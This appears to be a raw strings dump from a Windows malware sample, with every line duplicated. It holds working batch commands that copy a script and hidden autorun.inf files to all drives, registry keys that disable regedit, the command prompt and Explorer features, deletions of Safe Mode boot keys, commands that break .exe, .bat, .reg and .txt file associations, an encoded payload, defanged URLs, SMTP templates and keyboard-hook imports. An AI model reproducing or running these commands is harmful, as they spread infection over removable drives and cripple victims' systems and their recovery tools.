copy %0 d:\Program" "Files\run.bat
for %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min
for %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min
>>%%c:\system.bat
>>%%c:\system.bat
for %%c in (%alldrive%) do attrib autorun.inf r s h >>%%c:\system.bat
for %%c in (%alldrive%) do attrib autorun.inf r s h >>%%c:\system.bat
for %%c in (%alldrive%) do attrib %%c:\autorun.inf r s h >nul
for %%c in (%alldrive%) do attrib %%c:\autorun.inf r s h >nul
for %%c in (%alldrive%) do attrib %%c:\system.bat r s h >nul
for %%c in (%alldrive%) do attrib %%c:\system.bat r s h >nul
if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min >>d:\setup.bat
if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min >>d:\setup.bat
attrib d:\Program" "Files\run.bat r s h >nul
attrib d:\Program" "Files\run.bat r s h >nul
hXXp://VVV.hackbase.com/subject/2009-09-21/16408.htmlc:\kill.bat
hXXp://VVV.hackbase.com/subject/2009-09-21/16408.htmlc:\kill.bat
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun
SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled
SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind
SOFTWARE\360Safe\safemon\ExecAccess
SOFTWARE\360Safe\safemon\ExecAccess
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop
Software\Policies\Microsoft\Windows\System\DisableCMD
Software\Policies\Microsoft\Windows\System\DisableCMD
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu
Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803
Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools
Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
assoc .exe=nullfile
assoc .exe=nullfile
assoc .reg=nullfile
assoc .reg=nullfile
assoc .bat=nullfile
assoc .bat=nullfile
assoc .cmd=nullfile
assoc .cmd=nullfile
assoc .vbs=nullfile
assoc .vbs=nullfile
assoc .txt=nullfile
assoc .txt=nullfile
assoc .com=nullfile
assoc .com=nullfile
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\BlueStacks" /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\BlueStacks" /f
reg delete "HKEY_CLASSES_ROOT\bluestacks" /f
reg delete "HKEY_CLASSES_ROOT\bluestacks" /f
reg delete "HKEY_CLASSES_ROOT\BlueStacks.Apk" /f
reg delete "HKEY_CLASSES_ROOT\BlueStacks.Apk" /f
@reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d 00000001 /fc:\guanlian.bat
@reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d 00000001 /fc:\guanlian.bat
goto 22c:\slears.bat
goto 22c:\slears.bat
.slear
.slear
d:\sleartest.exe
d:\sleartest.exe
adm-music.com
adm-music.com
O%u,%
O%u,%
J÷%
J÷%
ul3PIDL7g7IDSO3lNfL4S7NfzpDVNfc4i7NfE447NftpZ7Nf84h7NfdEv4VdEEqpVdBET4VdSOXpVdWEk4VdoOc4VdoOU4VdWE74VdzO6pVdbEr4Vdf8V0IDoZf0IDD8oP
ul3PIDL7g7IDSO3lNfL4S7NfzpDVNfc4i7NfE447NftpZ7Nf84h7NfdEv4VdEEqpVdBET4VdSOXpVdWEk4VdoOc4VdoOU4VdWE74VdzO6pVdbEr4Vdf8V0IDoZf0IDD8oP
fEQ8HCD8Q4NfR4b7NfJ477Nftph4VdgEw4VdEED4VddEv4VdeE94VdJEhpVdbECHVdAEU4VdrOypVdlE6pVdoOc4VdfESPID78E0IDNZjP
fEQ8HCD8Q4NfR4b7NfJ477Nftph4VdgEw4VdEED4VddEv4VdeE94VdJEhpVdbECHVdAEU4VdrOypVdlE6pVdoOc4VdfESPID78E0IDNZjP
c:\windows\system32\
c:\windows\system32\
F%*.*f
F%*.*f
CNotSupportedException
CNotSupportedException
commctrl_DragListMsg
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
Afx:%x:%x
COMCTL32.DLL
COMCTL32.DLL
CCmdTarget
CCmdTarget
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
user32.dll
user32.dll
iphlpapi.dll
iphlpapi.dll
SHLWAPI.dll
SHLWAPI.dll
MPR.dll
MPR.dll
VERSION.dll
VERSION.dll
WSOCK32.dll
WSOCK32.dll
.PAVCException@@
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.prn)|*.prn|
(*.*)|*.*||
(*.*)|*.*||
Shell32.dll
Shell32.dll
Mpr.dll
Mpr.dll
Advapi32.dll
Advapi32.dll
User32.dll
User32.dll
Gdi32.dll
Gdi32.dll
Kernel32.dll
Kernel32.dll
(&07-034/)7 '
(&07-034/)7 '
?? / %d]
?? / %d]
%d / %d]
%d / %d]
: %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
(*.CUR)|*.CUR|
%s:%d
%s:%d
windows
windows
out.prn
out.prn
%d.%d
%d.%d
%d / %d
%d / %d
%d/%d
%d/%d
Bogus message code %d
Bogus message code %d
(%d-%d):
(%d-%d):
%ld%c
%ld%c
VVV.dywt.com.cn
VVV.dywt.com.cn
%s
%s
Reply-To: %s
Reply-To: %s
From: %s
From: %s
To: %s
To: %s
Subject: %s
Subject: %s
Date: %s
Date: %s
Cc: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
%a, %d %b %Y %H:%M:%S
SMTP
SMTP
.PAVCObject@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCUserException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
.PAVCArchiveException@@
zcÃ
zcÃ
c:\%original file name%.exe
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
#include "l.chs\afxres.rc" // Standard components
GetCPInfo
GetCPInfo
WinExec
WinExec
GetProcessHeap
GetProcessHeap
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyA
RegCreateKeyA
RegDeleteKeyA
RegDeleteKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
GetViewportExtEx
GetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
SetViewportExtEx
SetViewportExtEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
ShellExecuteA
ShellExecuteA
GetKeyState
GetKeyState
SetWindowsHookExA
SetWindowsHookExA
GetKeyboardLayout
GetKeyboardLayout
VkKeyScanExA
VkKeyScanExA
keybd_event
keybd_event
CreateDialogIndirectParamA
CreateDialogIndirectParamA
UnhookWindowsHookEx
UnhookWindowsHookEx
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
(*.*)
(*.*)